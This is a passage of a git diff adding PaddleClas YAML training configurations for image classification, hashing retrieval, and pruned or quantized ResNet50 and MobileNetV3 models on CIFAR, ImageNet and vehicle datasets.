+Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 32, 32] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50_vd + class_num: 100 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 32 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_mixup_CIFAR100_finetune.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_mixup_CIFAR100_finetune.yaml new file mode 100644 index 0000000..3e09ae5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/ResNet50_vd_mixup_CIFAR100_finetune.yaml @@ -0,0 +1,127 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 100 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 32, 32] + save_inference_dir: ./inference + +# model architecture +Arch: + name: ResNet50_vd + class_num: 100 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.04 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 32 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/CIFAR100/ + cls_label_path: ./dataset/CIFAR100/test_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 36 + - CropImage: + size: 32 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/VGG19_CIFAR10_DeepHash.yaml b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/VGG19_CIFAR10_DeepHash.yaml new file mode 100644 index 0000000..9722882 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/quick_start/professional/VGG19_CIFAR10_DeepHash.yaml @@ -0,0 +1,147 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + eval_mode: "retrieval" + epochs: 128 + print_batch_step: 10 + use_visualdl: False + + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + + #feature postprocess + feature_normalize: False + feature_binarize: "round" + +# model architecture +Arch: + name: "RecModel" + Backbone: + name: "VGG19Sigmoid" + pretrained: True + class_num: 48 + Head: + name: "FC" + class_num: 10 + embedding_size: 48 + + infer_output_key: "features" + infer_add_softmax: "false" + +# loss function config for train/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.01 + decay_epochs: [200] + values: [0.01, 0.001] + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/cifar10/ + cls_label_path: ./dataset/cifar10/cifar10-2/train.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 256 + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + Query: + dataset: + name: ImageNetDataset + image_root: ./dataset/cifar10/ + cls_label_path: ./dataset/cifar10/cifar10-2/test.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + + Gallery: + dataset: + name: ImageNetDataset + image_root: ./dataset/cifar10/ + cls_label_path: ./dataset/cifar10/cifar10-2/database.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.4914, 0.4822, 0.4465] + std: [0.2023, 0.1994, 0.2010] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - mAP: + - Precisionk: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_prune.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_prune.yaml new file mode 100644 index 0000000..958a136 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_prune.yaml @@ -0,0 +1,139 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# for quantization or prune model +Slim: + ## for prune + prune: + name: fpgm + pruned_ratio: 0.3 + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 1000 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.65 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_quantization.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_quantization.yaml new file mode 100644 index 0000000..6839998 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/MobileNetV3_large_x1_0_quantization.yaml @@ -0,0 +1,138 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 60 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# for quantalization or prune model +Slim: + ## for quantization + quant: + name: pact + +# model architecture +Arch: + name: MobileNetV3_large_x1_0 + class_num: 1000 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.065 + warmup_epoch: 0 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 256 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_prune.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_prune.yaml new file mode 100644 index 0000000..fd7d26b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_prune.yaml @@ -0,0 +1,138 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# for quantization or prune model +Slim: + ## for prune + prune: + name: fpgm + pruned_ratio: 0.3 + +# model architecture +Arch: + name: ResNet50_vd + class_num: 1000 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_quantization.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_quantization.yaml new file mode 100644 index 0000000..aeccaea --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vd_quantization.yaml @@ -0,0 +1,137 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 30 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# for quantalization or prune model +Slim: + ## for quantization + quant: + name: pact + +# model architecture +Arch: + name: ResNet50_vd + class_num: 1000 + pretrained: True + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.00007 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_prune.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_prune.yaml new file mode 100644 index 0000000..5e59e1b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_prune.yaml @@ -0,0 +1,135 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/vehicle_cls_ResNet50_CompCars_v1.2_pretrained.pdparams" + output_dir: "./output_vehicle_cls_prune/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 160 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + +Slim: + prune: + name: fpgm + pruned_ratio: 0.3 + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 431 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0005 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + bbox_crop: True + cls_label_path: "./dataset/CompCars/train_test_split/classification/train_label.txt" + transform_ops: + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedRandomIdentitySampler + batch_size: 128 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 8 + use_shared_memory: True + + Eval: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + cls_label_path: "./dataset/CompCars/train_test_split/classification/test_label.txt" + bbox_crop: True + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_quantization.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_quantization.yaml new file mode 100644 index 0000000..1ec73b0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_cls_quantization.yaml @@ -0,0 +1,134 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/vehicle_cls_ResNet50_CompCars_v1.2_pretrained.pdparams" + output_dir: "./output_vehicle_cls_pact/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 80 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + +Slim: + quant: + name: pact + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 431 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.001 + regularizer: + name: 'L2' + coeff: 0.0005 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + bbox_crop: True + cls_label_path: "./dataset/CompCars/train_test_split/classification/train_label.txt" + transform_ops: + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedRandomIdentitySampler + batch_size: 128 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 8 + use_shared_memory: True + + Eval: + dataset: + name: "CompCars" + image_root: "./dataset/CompCars/image/" + label_root: "./dataset/CompCars/label/" + cls_label_path: "./dataset/CompCars/train_test_split/classification/test_label.txt" + bbox_crop: True + transform_ops: + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 8 + use_shared_memory: True + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] + diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_prune.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_prune.yaml new file mode 100644 index 0000000..f9c86e2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_prune.yaml @@ -0,0 +1,162 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/vehicle_reid_ResNet50_VERIWild_v1.1_pretrained.pdparams" + output_dir: "./output_vehicle_reid_prune/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 160 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + eval_mode: "retrieval" + +# for quantizaiton or prune model +Slim: + ## for prune + prune: + name: fpgm + pruned_ratio: 0.3 + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 30671 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images/" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/train_list_start0.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AugMix: + prob: 0.5 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.5 + sl: 0.02 + sh: 0.4 + r1: 0.3 + mean: [0., 0., 0.] + + sampler: + name: DistributedRandomIdentitySampler + batch_size: 128 + num_instances: 2 + drop_last: False + shuffle: True + loader: + num_workers: 6 + use_shared_memory: True + Eval: + Query: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id_query.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + + Gallery: + dataset: + name: "VeriWild" + image_root: "./dataset/VeRI-Wild/images" + cls_label_path: "./dataset/VeRI-Wild/train_test_split/test_3000_id.txt" + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + size: 224 + - NormalizeImage: + scale: 0.00392157 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 6 + use_shared_memory: True + +Metric: + Eval: + - Recallk: + topk: [1, 5] + - mAP: {} + diff --git a/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_quantization.yaml b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_quantization.yaml new file mode 100644 index 0000000..aff5228 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/slim/ResNet50_vehicle_reid_quantization.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: "https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/rec/models/pretrain/vehicle_reid_ResNet50_VERIWild_v1.1_pretrained.pdparams" + output_dir: "./output_vehicle_reid_pact/" + device: "gpu" + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 40 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: "./inference" + eval_mode: "retrieval" + +# for quantizaiton or prune model +Slim: + ## for prune + quant: + name: pact + +# model architecture +Arch: + name: "RecModel" + infer_output_key: "features" + infer_add_softmax: False + Backbone: + name: "ResNet50_last_stage_stride1" + pretrained: True + BackboneStopLayer: + name: "adaptive_avg_pool2d_0" + Neck: + name: "VehicleNeck" + in_channels: 2048 + out_channels: 512 + Head: + name: "ArcMargin" + embedding_size: 512 + class_num: 30671 + margin: 0.15 + scale: 32 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + - SupConLoss: + weight: 1.0 + views: 2 + Eval: + - CELoss: + weight: 1.0 + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.001 + regularizer: + name: 'L2' + coeff: 0.0005 + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: "VeriWild" + image_root: 